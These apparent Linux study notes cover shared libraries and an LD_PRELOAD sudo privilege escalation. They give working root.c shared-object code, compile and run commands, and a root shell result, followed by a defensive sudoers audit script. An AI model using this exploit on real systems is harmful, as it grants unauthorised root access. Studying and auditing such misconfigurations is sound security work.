Shared Libraries
There are two types of library in Linux:
- Static libraries (ending in the .a extension)
- Dynamically linked shared object libraries (.so extension)

Methods of specifying the location of dynamic libraries:
- the -rpath or -rpath-link flags when compiling a program
- the LD_RUN_PATH or LD_LIBRARY_PATH environment variables
- placing libraries in the /lib or /usr/lib default directories
- specifying another directory containing the libraries in the /etc/ld.so.conf configuration file
- the LD_PRELOAD environment variable
Viewing the shared objects required by a binary
$ ldd /bin/ls
linux-vdso.so.1 => (0x00007fff03bc7000)
libselinux.so.1 => /lib/x86_64-linux-gnu/libselinux.so.1 (0x00007f4186288000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f4185ebe000)
libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007f4185c4e000)
libdl.so.2 => /lib/x86_64-linux-gnu/libdl.so.2 (0x00007f4185a4a000)
/lib64/ld-linux-x86-64.so.2 (0x00007f41864aa000)
libpthread.so.0 => /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007f418582d000)
Sample Exploitation
Use sudo -l to check whether LD_PRELOAD is kept in the sudo environment:

$ sudo -l
Matching Defaults entries for daniel.carter on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD
User daniel.carter may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/apache2 restart
Under normal circumstances, apache2 is NOT listed on GTFOBins, so on its own it can't be used for privilege escalation. However, since env_keep+=LD_PRELOAD means LD_PRELOAD survives sudo's env_reset, the loader will map any shared object we name in it into the root apache2 process before main() runs, so we can exploit this.

Create a root.c file:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid(), setuid() */

/* Runs when the loader maps the library (the library is built with
 * -nostartfiles so _init is not provided by the C runtime). */
void _init() {
    unsetenv("LD_PRELOAD");   /* avoid re-triggering in the child shell */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
Compile root.c into a shared object:
$ gcc -fPIC -shared -o root.so root.c -nostartfiles
Run apache2 via sudo with root.so in LD_PRELOAD; the shell it spawns runs as root:

$ sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart
# id
uid=0(root) gid=0(root) groups=0(root)
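An added audit check from the defender's side (not code from the original page): it parses sudo -l style text such as the NIX02 output above and reports any LD_* variable that an env_keep clause preserves, alongside a corrected configuration with the entry removed. The user, host and both sample texts are constructed; pass --live to run it against the current account's real sudo rules.

```shell
#!/bin/sh
# Added audit helper, not part of the original page: find loader-controlling
# variables (LD_PRELOAD, LD_LIBRARY_PATH, LD_AUDIT) that sudo's env_keep lets
# through env_reset. The fix is to drop them from env_keep in sudoers.

# Constructed sample modelled on the page's NIX02 output (user/host assumed).
SAMPLE_SUDO_L='Matching Defaults entries for daniel.carter on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD
User daniel.carter may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/apache2 restart'

# Constructed hardened variant: the same rules minus the env_keep entry.
SAMPLE_SUDO_L_FIXED='Matching Defaults entries for daniel.carter on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User daniel.carter may run the following commands on NIX02:
    (root) NOPASSWD: /usr/sbin/apache2 restart'

# Print, one per line, each LD_* variable named in an env_keep clause of $1.
# Only lines that set env_keep are inspected, so LD_* elsewhere is ignored.
find_kept_loader_vars() {
    printf '%s\n' "$1" \
        | grep -E 'env_keep[[:space:]]*\+?=' \
        | grep -oE 'LD_(PRELOAD|LIBRARY_PATH|AUDIT)' \
        | sort -u
}

# Exit status 0 when at least one loader variable is kept (a finding), else 1.
loader_vars_kept() {
    [ -n "$(find_kept_loader_vars "$1")" ]
}

# Human-readable report for one configuration text, labelled with $1.
report() {
    vars=$(find_kept_loader_vars "$2")
    if [ -n "$vars" ]; then
        printf '%s: FINDING, env_keep preserves: %s\n' "$1" "$(printf '%s' "$vars" | tr '\n' ' ')"
    else
        printf '%s: ok, no loader variables kept\n' "$1"
    fi
}

report "sample (weak)" "$SAMPLE_SUDO_L"
report "sample (fixed)" "$SAMPLE_SUDO_L_FIXED"

# --live audits the real rules; sudo -n fails quietly if a password is needed.
if [ "${1:-}" = "--live" ]; then
    report "sudo -l" "$(sudo -n -l 2>/dev/null)"
fi
```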